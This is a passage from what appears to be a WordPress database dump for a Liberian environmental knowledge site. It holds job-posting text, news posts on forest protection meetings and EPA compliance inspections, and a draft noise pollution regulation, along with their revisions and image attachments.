and increased threats of flooding and erosion to nearby coastal communities. Liberia’s economy and communities are greatly affected by the effects of climate change with a focus particularly toward increased flooding and coastal erosion caused by rising sea levels and severe weather conditions like storm surges in regions such as Monrovia and other cities in Liberia including Robertsport and Harper where informal settlements face significant risks due to lack of proper infrastructure leading to regular flooding incidents causing damage to buildings and infrastructure as well as health issues due to sanitation problems. Rising ocean temperatures pose a threat to marine environments beyond just physical dangers by putting fish stocks at risk. Crucial for the nation’s fisheries and food security backbone. The issue of overfishing worsens with the deterioration of mangroves and coastal habitats leading to a decline in fish populations. As per the IPCCs Assessment Report, findings suggest that West Africa is anticipated to be heavily impacted by climate change with projections pointing towards elevated temperatures and more frequent occurrences of heatwaves and extreme precipitation events which could result in increased flooding, especially, in Liberia and neighboring regions.\r\n\r\n<strong>OBJECTIVE </strong>\r\n\r\nThe Project Manager’s primary responsibility is to ensure that the Project delivers the results specified in the Project Document, to the required standard of quality and within the specified constraints of time and cost. The Project Manager will manage the day-to-day activities of the PMU and other stakeholders involved in the implementation of the Project by providing technical, management and coordination support. He/she will be working closely with a project team composed of the Administrative and Financial Assistant, Procurement Officer, Monitoring &amp; Evaluation Officer, Gender, Safeguard &amp; Stakeholder Engagement Expert, Knowledge Management &amp; Communication Officer, Innovative Finance Expert, and Driver. The Project Manager typically presents key deliverables and documents to the board for their review and approval, including.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/05/Final-TOR_Project-Manager_SARTLASG.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/05/Final-Recruitment-strategy-SARTLA-Project-Manager-SARTLASG.docx\" target=\"_blank\" rel=\"noopener\">Final-Recruitment-strategy-SARTLA-Project-Manager-SARTLASG.docx</a>\r\n\r\n&nbsp;','Project Manager','','inherit','closed','closed','','5895-revision-v1','','','2026-05-26 12:44:43','2026-05-26 12:44:43','',5895,'https://ekmsliberia.info/?p=5900',0,'revision','',0),(5902,38,'2026-05-21 14:28:23','2026-05-21 14:28:23','<!-- wp:paragraph -->\n<p>Greenville, Sinoe County, May 16, 2026 — The Forestry Development Authority (FDA), in partnership with the Ministry of Local Government, the Wild Chimpanzee Foundation (WCF), and other stakeholders, hosted a two-day regional coordination meeting in Greenville, Sinoe County, from May 15–16, 2026. Supported by funding from the European Union, the gathering brought together government officials, security agencies, and community representatives to address pressing challenges in Liberia’s southern forest landscape.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting drew participants from the Armed Forces of Liberia (AFL), Liberia National Police (LNP), Liberia Refugee Repatriation and Resettlement Commission (LRRRC), county attorneys, and the superintendents of Rivercess, Grand Gedeh, River Gee, and Sinoe counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Opening the event, a representative of Sinoe County’s newly appointed Superintendent, Hon. Alex N. Sleweon, emphasized the importance of collective responsibility in safeguarding Liberia’s forests. Protected Area Manager Madam Evangeline Swope reinforced this message, stressing the need for alignment between community initiatives and government policy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5903,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/05/today-news-2-1024x768.jpg\" alt=\"\" class=\"wp-image-5903\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>FDA Managing Director Rudolph J. Merab, Sr. highlighted Liberia’s conservation legacy, recalling the Forest Act of 1953 and the 1963 proclamation that designated eleven forests as national heritage sites. “The forest being conserved is our asset in Liberia,” he said, underscoring that conservation is a shared national duty. Merab urged county superintendents to act decisively against the influx of Burkinabe migrants and the resulting forest destruction, while reiterating his administration’s focus on “people, planet, and profit.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Addressing Cocoa Farming and Migrant Dynamics</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Technical Manager for Conservation, Mr. Jerry Yonmah, presented outcomes from the November 2025 National Forest Forum, noting progress in legal reforms since the passage of the National Forestry Law in 2003. He warned against unregulated cocoa farming, which has fueled deforestation, and called for stronger enforcement of sustainable practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>WCF Country Director Dr. Annika Hillers echoed these concerns, pointing to deforestation linked to Burkinabe migrants engaged in cocoa farming and illegal mining in protected areas such as Proposed National Park KWA, Grebo-Krahn, and Sapo National Park. She urged greater inter-agency collaboration to protect Liberia’s biodiversity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Commitments to Action</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting concluded with pledges from institutions including the AFL, LRRRC, county attorneys, and superintendents to intensify efforts against illegal forest exploitation. LRRRC Executive Director Cllr. Cole Bangalu revealed that his agency’s assessments identified more than 80,000 Burkinabes residing in Grand Gedeh County alone, underscoring the scale of the challenge.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Facilitated by Madam Comfort Sakui, Awareness and Ecotourism Manager, the workshop reinforced the importance of community engagement in conservation. Stakeholders vowed to ensure that Liberia’s forest resources benefit its citizens rather than foreign actors engaged in unsanctioned activities.</p>\n<!-- /wp:paragraph -->','FDA, WCF, and Partners Strengthen Forest Protection in Southern Liberia','','publish','open','open','','fda-wcf-and-partners-strengthen-forest-protection-in-southern-liberia','','','2026-05-26 14:33:35','2026-05-26 14:33:35','',0,'https://ekmsliberia.info/?p=5902',12,'post','',0),(5903,38,'2026-05-26 14:31:29','2026-05-26 14:31:29','','today news 2','','inherit','open','closed','','today-news-2-2','','','2026-05-26 14:31:29','2026-05-26 14:31:29','',5902,'https://ekmsliberia.info/wp-content/uploads/2026/05/today-news-2.jpg',0,'attachment','image/jpeg',0),(5904,38,'2026-05-26 14:32:29','2026-05-26 14:32:29','','today news','','inherit','open','closed','','today-news-4','','','2026-05-26 14:32:29','2026-05-26 14:32:29','',5902,'https://ekmsliberia.info/wp-content/uploads/2026/05/today-news.jpg',0,'attachment','image/jpeg',0),(5905,38,'2026-05-26 14:33:29','2026-05-26 14:33:29','<!-- wp:paragraph -->\n<p>Greenville, Sinoe County, May 16, 2026 — The Forestry Development Authority (FDA), in partnership with the Ministry of Local Government, the Wild Chimpanzee Foundation (WCF), and other stakeholders, hosted a two-day regional coordination meeting in Greenville, Sinoe County, from May 15–16, 2026. Supported by funding from the European Union, the gathering brought together government officials, security agencies, and community representatives to address pressing challenges in Liberia’s southern forest landscape.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting drew participants from the Armed Forces of Liberia (AFL), Liberia National Police (LNP), Liberia Refugee Repatriation and Resettlement Commission (LRRRC), county attorneys, and the superintendents of Rivercess, Grand Gedeh, River Gee, and Sinoe counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Opening the event, a representative of Sinoe County’s newly appointed Superintendent, Hon. Alex N. Sleweon, emphasized the importance of collective responsibility in safeguarding Liberia’s forests. Protected Area Manager Madam Evangeline Swope reinforced this message, stressing the need for alignment between community initiatives and government policy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5903,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/05/today-news-2-1024x768.jpg\" alt=\"\" class=\"wp-image-5903\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>FDA Managing Director Rudolph J. Merab, Sr. highlighted Liberia’s conservation legacy, recalling the Forest Act of 1953 and the 1963 proclamation that designated eleven forests as national heritage sites. “The forest being conserved is our asset in Liberia,” he said, underscoring that conservation is a shared national duty. Merab urged county superintendents to act decisively against the influx of Burkinabe migrants and the resulting forest destruction, while reiterating his administration’s focus on “people, planet, and profit.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Addressing Cocoa Farming and Migrant Dynamics</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Technical Manager for Conservation, Mr. Jerry Yonmah, presented outcomes from the November 2025 National Forest Forum, noting progress in legal reforms since the passage of the National Forestry Law in 2003. He warned against unregulated cocoa farming, which has fueled deforestation, and called for stronger enforcement of sustainable practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>WCF Country Director Dr. Annika Hillers echoed these concerns, pointing to deforestation linked to Burkinabe migrants engaged in cocoa farming and illegal mining in protected areas such as Proposed National Park KWA, Grebo-Krahn, and Sapo National Park. She urged greater inter-agency collaboration to protect Liberia’s biodiversity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Commitments to Action</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting concluded with pledges from institutions including the AFL, LRRRC, county attorneys, and superintendents to intensify efforts against illegal forest exploitation. LRRRC Executive Director Cllr. Cole Bangalu revealed that his agency’s assessments identified more than 80,000 Burkinabes residing in Grand Gedeh County alone, underscoring the scale of the challenge.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Facilitated by Madam Comfort Sakui, Awareness and Ecotourism Manager, the workshop reinforced the importance of community engagement in conservation. Stakeholders vowed to ensure that Liberia’s forest resources benefit its citizens rather than foreign actors engaged in unsanctioned activities.</p>\n<!-- /wp:paragraph -->','FDA, WCF, and Partners Strengthen Forest Protection in Southern Liberia','','inherit','closed','closed','','5902-revision-v1','','','2026-05-26 14:33:29','2026-05-26 14:33:29','',5902,'https://ekmsliberia.info/?p=5905',0,'revision','',0),(5906,38,'2026-05-24 14:34:37','2026-05-24 14:34:37','<!-- wp:paragraph -->\n<p>Monrovia, Liberia, May 24, 2026 – The Environmental Protection Agency (EPA) of Liberia has concluded the first week of its Nationwide Environmental Compliance Monitoring Exercise, while inspection teams remain actively deployed across multiple counties as the operation transitions into an intensive second week.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The nationwide exercise, which is part of the EPA’s strengthened enforcement drive, has seen teams conducting continuous field inspections of mining operations, agricultural concessions, industrial facilities, and other business establishments to ensure compliance with the Environmental Protection and Management Law (EPML) of Liberia and related environmental regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the first week, the monitoring exercise recorded several enforcement actions, including shutdown orders, issuance of non-compliance notices, and seizure of equipment linked to illegal or environmentally harmful activities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Key violations identified include operating without valid environmental permits, failure to obtain chemical importation and registration licenses, improper handling of hazardous substances, pollution of water bodies, land degradation, and failure to rehabilitate mined-out areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA noted that these violations continue to pose serious threats to public health, biodiversity, and environmental sustainability, stressing that enforcement will be sustained without compromise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the Agency, although Week One has officially ended, inspection teams have not withdrawn from the field and remain actively engaged in ongoing compliance monitoring activities across various counties as Week Two operations begin seamlessly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5907,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/05/epa-errs-1024x768.jpg\" alt=\"\" class=\"wp-image-5907\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirmed its commitment to strict enforcement of environmental laws while also encouraging operators to take immediate corrective actions to ensure compliance and avoid further sanctions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Support for the exercise continues to grow, with local authorities, community leaders, and citizens providing key information and cooperation to inspection teams in identifying environmental violations within their areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Under the leadership of Executive Director Environmental Protection Agency of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, the Agency reiterated its zero-tolerance stance on environmental degradation and unlawful operations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA warned that all entities found in violation of environmental regulations will face the full weight of enforcement measures as provided by law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The nationwide compliance monitoring exercise remains ongoing, as the Agency intensifies efforts to safeguard Liberia’s environment, protect natural resources, and promote sustainable development for present and future generations</p>\n<!-- /wp:paragraph -->','EPA Wraps Up Week One of Nationwide Environmental Compliance Monitoring Exercise; Teams Remain Deployed as Intensive Week Two Commences','','publish','open','open','','epa-wraps-up-week-one-of-nationwide-environmental-compliance-monitoring-exercise-teams-remain-deployed-as-intensive-week-two-commences','','','2026-05-26 14:42:28','2026-05-26 14:42:28','',0,'https://ekmsliberia.info/?p=5906',11,'post','',0),(5907,38,'2026-05-26 14:40:22','2026-05-26 14:40:22','','epa errs','','inherit','open','closed','','epa-errs','','','2026-05-26 14:40:22','2026-05-26 14:40:22','',5906,'https://ekmsliberia.info/wp-content/uploads/2026/05/epa-errs.jpg',0,'attachment','image/jpeg',0),(5908,38,'2026-05-26 14:41:17','2026-05-26 14:41:17','','new epa1','','inherit','open','closed','','new-epa1','','','2026-05-26 14:41:17','2026-05-26 14:41:17','',5906,'https://ekmsliberia.info/wp-content/uploads/2026/05/new-epa1.jpg',0,'attachment','image/jpeg',0),(5909,38,'2026-05-26 14:42:25','2026-05-26 14:42:25','<!-- wp:paragraph -->\n<p>Monrovia, Liberia, May 24, 2026 – The Environmental Protection Agency (EPA) of Liberia has concluded the first week of its Nationwide Environmental Compliance Monitoring Exercise, while inspection teams remain actively deployed across multiple counties as the operation transitions into an intensive second week.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The nationwide exercise, which is part of the EPA’s strengthened enforcement drive, has seen teams conducting continuous field inspections of mining operations, agricultural concessions, industrial facilities, and other business establishments to ensure compliance with the Environmental Protection and Management Law (EPML) of Liberia and related environmental regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the first week, the monitoring exercise recorded several enforcement actions, including shutdown orders, issuance of non-compliance notices, and seizure of equipment linked to illegal or environmentally harmful activities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Key violations identified include operating without valid environmental permits, failure to obtain chemical importation and registration licenses, improper handling of hazardous substances, pollution of water bodies, land degradation, and failure to rehabilitate mined-out areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA noted that these violations continue to pose serious threats to public health, biodiversity, and environmental sustainability, stressing that enforcement will be sustained without compromise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the Agency, although Week One has officially ended, inspection teams have not withdrawn from the field and remain actively engaged in ongoing compliance monitoring activities across various counties as Week Two operations begin seamlessly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5907,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/05/epa-errs-1024x768.jpg\" alt=\"\" class=\"wp-image-5907\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirmed its commitment to strict enforcement of environmental laws while also encouraging operators to take immediate corrective actions to ensure compliance and avoid further sanctions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Support for the exercise continues to grow, with local authorities, community leaders, and citizens providing key information and cooperation to inspection teams in identifying environmental violations within their areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Under the leadership of Executive Director Environmental Protection Agency of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, the Agency reiterated its zero-tolerance stance on environmental degradation and unlawful operations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA warned that all entities found in violation of environmental regulations will face the full weight of enforcement measures as provided by law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The nationwide compliance monitoring exercise remains ongoing, as the Agency intensifies efforts to safeguard Liberia’s environment, protect natural resources, and promote sustainable development for present and future generations</p>\n<!-- /wp:paragraph -->','EPA Wraps Up Week One of Nationwide Environmental Compliance Monitoring Exercise; Teams Remain Deployed as Intensive Week Two Commences','','inherit','closed','closed','','5906-revision-v1','','','2026-05-26 14:42:25','2026-05-26 14:42:25','',5906,'https://ekmsliberia.info/?p=5909',0,'revision','',0),(5910,38,'2026-05-23 14:47:10','2026-05-23 14:47:10','<!-- wp:paragraph -->\n<p>Grand Gedeh County, May 23, 2026 – The Environmental Protection Agency (EPA) commenced Day VI of the Nationwide Environmental Compliance Monitoring Exercise with an inspection of the operations of Gannon Melina Group of Company in Kahn Village, Gorbor Robert, Grand Gedeh County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company is engaged in Class C gold mining operations and was found operating with six excavator machines and two medium-sized gold processing plants at two separate mining sites.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the inspection, EPA officers observed several serious environmental violations. Among the most alarming findings was the diversion of the Slomehn Creek by the company to facilitate its mining activities. Inspectors also established that the company was operating without a valid Environmental Permit, in direct violation of Liberia\'s Environmental Protection and Management Law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA further noted that the company\'s activities have caused significant water pollution and extensive land degradation in the affected areas. Inspectors observed that previously mined portions of the concession had been abandoned without any restoration or rehabilitation measures, leaving the environment severely disturbed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5912,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/05/epa-news-cand-e-1024x768.jpg\" alt=\"\" class=\"wp-image-5912\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The violations come months after the company\'s operations were formally reported to the EPA on March 10, 2026, by residents of Pyne Town, Sanquin, Gbliyee, and Kwerteh Town through SAPO Campaigners. Community members accused the company of polluting the Slomehn Creek, a major waterway that flows into the Sanquin River in Carbadea, Sinoe County, thereby threatening downstream communities and aquatic ecosystems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Following the findings, the EPA enforcement team immediately ordered the shutdown of the company\'s mining operations and issued two separate non-compliance notices for:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1. Operating without a valid Environmental Permit; and</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2. Causing environmental pollution and land degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency emphasized that the diversion of natural watercourses, pollution of water bodies, and failure to restore mined-out areas constitute serious breaches of environmental regulations and pose significant risks to public health, biodiversity, and local livelihoods.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirmed its commitment to protecting Liberia\'s environment and natural resources, stressing that no company will be allowed to operate outside the framework of the law.</p>\n<!-- /wp:paragraph -->','EPA Shuts Down Gannon Melina Group of Company for Illegal Mining and Environmental Pollution in Grand Gedeh County','','publish','open','open','','epa-shuts-down-gannon-melina-group-of-company-for-illegal-mining-and-environmental-pollution-in-grand-gedeh-county','','','2026-05-26 14:52:17','2026-05-26 14:52:17','',0,'https://ekmsliberia.info/?p=5910',10,'post','',0),(5911,38,'2026-05-26 14:50:49','2026-05-26 14:50:49','','epa news c&e','','inherit','open','closed','','epa-news-ce','','','2026-05-26 14:50:49','2026-05-26 14:50:49','',5910,'https://ekmsliberia.info/wp-content/uploads/2026/05/epa-news-ce.jpg',0,'attachment','image/jpeg',0),(5912,38,'2026-05-26 14:51:30','2026-05-26 14:51:30','','epa news  cand e','','inherit','open','closed','','epa-news-cand-e','','','2026-05-26 14:51:30','2026-05-26 14:51:30','',5910,'https://ekmsliberia.info/wp-content/uploads/2026/05/epa-news-cand-e.jpg',0,'attachment','image/jpeg',0),(5913,38,'2026-05-26 14:52:14','2026-05-26 14:52:14','<!-- wp:paragraph -->\n<p>Grand Gedeh County, May 23, 2026 – The Environmental Protection Agency (EPA) commenced Day VI of the Nationwide Environmental Compliance Monitoring Exercise with an inspection of the operations of Gannon Melina Group of Company in Kahn Village, Gorbor Robert, Grand Gedeh County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company is engaged in Class C gold mining operations and was found operating with six excavator machines and two medium-sized gold processing plants at two separate mining sites.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the inspection, EPA officers observed several serious environmental violations. Among the most alarming findings was the diversion of the Slomehn Creek by the company to facilitate its mining activities. Inspectors also established that the company was operating without a valid Environmental Permit, in direct violation of Liberia\'s Environmental Protection and Management Law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA further noted that the company\'s activities have caused significant water pollution and extensive land degradation in the affected areas. Inspectors observed that previously mined portions of the concession had been abandoned without any restoration or rehabilitation measures, leaving the environment severely disturbed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5912,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/05/epa-news-cand-e-1024x768.jpg\" alt=\"\" class=\"wp-image-5912\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The violations come months after the company\'s operations were formally reported to the EPA on March 10, 2026, by residents of Pyne Town, Sanquin, Gbliyee, and Kwerteh Town through SAPO Campaigners. Community members accused the company of polluting the Slomehn Creek, a major waterway that flows into the Sanquin River in Carbadea, Sinoe County, thereby threatening downstream communities and aquatic ecosystems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Following the findings, the EPA enforcement team immediately ordered the shutdown of the company\'s mining operations and issued two separate non-compliance notices for:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1. Operating without a valid Environmental Permit; and</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>2. Causing environmental pollution and land degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency emphasized that the diversion of natural watercourses, pollution of water bodies, and failure to restore mined-out areas constitute serious breaches of environmental regulations and pose significant risks to public health, biodiversity, and local livelihoods.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirmed its commitment to protecting Liberia\'s environment and natural resources, stressing that no company will be allowed to operate outside the framework of the law.</p>\n<!-- /wp:paragraph -->','EPA Shuts Down Gannon Melina Group of Company for Illegal Mining and Environmental Pollution in Grand Gedeh County','','inherit','closed','closed','','5910-revision-v1','','','2026-05-26 14:52:14','2026-05-26 14:52:14','',5910,'https://ekmsliberia.info/?p=5913',0,'revision','',0),(5914,38,'2026-05-26 14:54:11','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>Bomi Estate, Grand Cape Mount County – The Environmental Protection Agency (EPA) Zone A Team on Day 5, May 22, 2026 of the Nationwide Environmental Monitoring Exercise conducted a comprehensive inspection of Mano Palm Oil Plantation, assessing the company\'s environmental compliance and operational practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inspection covered the plantation\'s main office, Grand Cape Mount Mill, refinery, effluent treatment systems, waste storage facilities, used-oil management area, and other operational sites.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA inspectors observed several positive developments, including significant improvements in housekeeping and mill operations. The team noted cleaner working conditions, the absence of visible oil spills around fuel storage areas and filling stations, as well as improved management of effluent treatment ponds.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite these improvements, the monitoring team identified several environmental compliance concerns. Among the key issues were delays in renewing environmental permits, inadequate waste management practices, continued storage of domestic and agrochemical waste within the facility, community encroachment into designated buffer zones, and the engagement of a waste management contractor that is not certified by the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the conclusion of the inspection, the EPA team highlighted the major non-conformance issues to the company\'s management and issued a Non-Compliance Notice for failing to obtain an Effluent Discharge License, a key requirement under Liberia\'s environmental regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA emphasized the importance of maintaining full compliance with environmental laws and urged the company to take immediate corrective measures to address the identified deficiencies.</p>\n<!-- /wp:paragraph -->','EPA Cites Mano Palm Oil Plantation for Environmental Non-Compliance in Grand Cape Mount','','draft','open','open','','','','','2026-05-26 14:54:11','2026-05-26 14:54:11','',0,'https://ekmsliberia.info/?p=5914',9,'post','',0),(5915,38,'2026-05-27 16:59:13','0000-00-00 00:00:00','','NOISE POLLUTION AND CONTROL REGULATION Validated October 31, 2025','','draft','closed','closed','','','','','2026-05-27 16:59:13','2026-05-27 16:59:13','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5915',5,'document','',0),(5917,38,'2025-11-17 17:08:37','2025-11-17 17:08:37','<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>REGULATORY INSTRUMENT</strong>\r\n\r\nIN EXERCISE of the powers conferred by (Part IV Sections 41, 42, &amp; 43) of the Environmental Protection &amp; Management Law of Liberia, the Environmental Protection Agency promulgates the following Regulations:\r\n\r\nInstrument: Noise Pollution and Control Regulations, 2025 Instrument no: RI/EPA/001-08/25\r\nPrepared by: EPA\r\nApproved by: EPA POLICY COUNCIL\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"column\">\r\n\r\n<strong>Maximum Permissible Intrusive Noise Levels</strong>\r\nNoise limits for automobiles (from 7.5 meters in dB(A) at the manufacturing stage)\r\nDomestic appliances and construction equipment at the Manufacturing Stage\r\nMaximum Permissible Noise Levels for Construction Sites\r\nMaximum Permissible Noise Levels for Mines and Quarries\r\nApplication for a Permit to Emit Noise/ Vibrations in Excess of Permissible Levels\r\nPermit to Emit Noise/ Vibrations in Excess of Permissible\r\nLevels\r\nApplication for a Permit to Carry out Activities\r\nPermit to Emit Noise in Excess\r\nMinimum Requirements for Strategic Noise and Excessive\r\nVibrations Mapping\r\nMinimum Requirements for\r\nAction Plans\r\nImprovement Notice\r\nFees\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n08/29/2025\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nNoise Pollution and Control Regulations, 2025\r\n\r\n</div>\r\n<div class=\"column\">\r\n\r\n<strong>EPA Liberia</strong>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 6\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nIN EXERCISE of the powers conferred by the Environmental Protection &amp; Management Act (Section 41, 42 &amp; 43), the Environmental Protection Agency makes the following Regulations:\r\n\r\n</div>\r\n</div>\r\n</div>','NOISE POLLUTION AND CONTROL REGULATION Validated October 31, 2025','','publish','closed','closed','','noise-pollution-and-control-regulation-validated-october-31-2025','','','2026-05-28 08:50:13','2026-05-28 08:50:13','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5917',4,'document','',0),(5916,38,'2026-05-27 16:52:47','2026-05-27 16:52:47','','Screenshot 2026-05-27 at 16.46.50','','inherit','open','closed','','screenshot-2026-05-27-at-16-46-50','','','2026-05-27 16:52:47','2026-05-27 16:52:47','',5915,'https://ekmsliberia.info/wp-content/uploads/2026/05/Screenshot-2026-05-27-at-16.46.50.png',0,'attachment','image/png',0),(5918,38,'2026-05-27 17:09:35','2026-05-27 17:09:35','','Screenshot 2026-05-27 at 17.03.27','','inherit','open','closed','','screenshot-2026-05-27-at-17-03-27','','','2026-05-27 17:09:35','2026-05-27 17:09:35','',5917,'https://ekmsliberia.info/wp-content/uploads/2026/05/Screenshot-2026-05-27-at-17.03.27.png',0,'attachment','image/png',0),(5919,38,'2026-05-27 17:10:21','2026-05-27 17:10:21','','NOISE_POLLUTION_AND_CONTROL_REGULATION_FINAL 2025-EPA.pdf 11','','inherit','open','closed','','noise_pollution_and_control_regulation_final-2025-epa-pdf-11','','','2026-05-27 17:10:21','2026-05-27 17:10:21','',5917,'https://ekmsliberia.info/wp-content/uploads/2026/05/NOISE_POLLUTION_AND_CONTROL_REGULATION_FINAL-2025-EPA.pdf-11.pdf',0,'attachment','application/pdf',0),(5920,38,'2026-05-27 17:17:22','2026-05-27 17:17:22','<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>REGULATORY INSTRUMENT</strong>\r\n\r\nIN EXERCISE of the powers conferred by (Part IV Sections 41, 42, &amp; 43) of the Environmental Protection &amp; Management Law of Liberia, the Environmental Protection Agency promulgates the following Regulations:\r\n\r\nInstrument: Noise Pollution and Control Regulations, 2025 Instrument no: RI/EPA/001-08/25\r\nPrepared by: EPA\r\nApproved by: EPA POLICY COUNCIL\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div 